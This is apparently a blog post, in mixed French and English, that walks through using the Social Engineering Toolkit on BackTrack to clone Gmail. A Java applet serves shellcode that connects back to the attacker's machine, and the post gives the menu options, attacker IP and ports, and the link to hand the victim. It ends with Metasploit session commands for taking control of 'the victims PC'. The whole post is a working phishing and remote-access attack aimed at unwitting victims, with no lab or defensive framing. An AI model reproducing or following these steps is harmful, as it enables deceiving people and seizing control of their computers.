Ouvrez le terminal et taper backtrack cd /pentest/exploits/set
maintenant Social Engineering Toolkit (SET). /set
maintenant choisir option 5, “Update the Social-Engineering Toolkit”
maintenant choisir option 1, “Social-Engineering Attacks”
maintenant option 2, “Website Attack Vectors”
maintenant option 1 the Java Applet Attack Method
on choisie option 2, “Site Cloner”
Are you using NAT/PORT Forwarding: no
Enter the IP address to connect back on: 192.168.1.3 (IP address de votre PC)
Enter the URL to clone: http://www.gmail.com (but you can use any website to run the Java Applet)
on choix 16 “Multi PyInjector Shellcode Injection”
par la suite Port of the attacker computer. In this example I use port 443
Select the payload you want to deliver via shellcodeexec press enter here
Now again select Port of the attacker computer. In this example I use port 444 and 445
Select the payload you want to deliver via shellcodeexec press enter here
Now it creates the backdoor program, encodes and packs. It creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this:
Now an URL you should give to your victim http://192.168.1.3
When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.
You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
0 commentaires:
Enregistrer un commentaire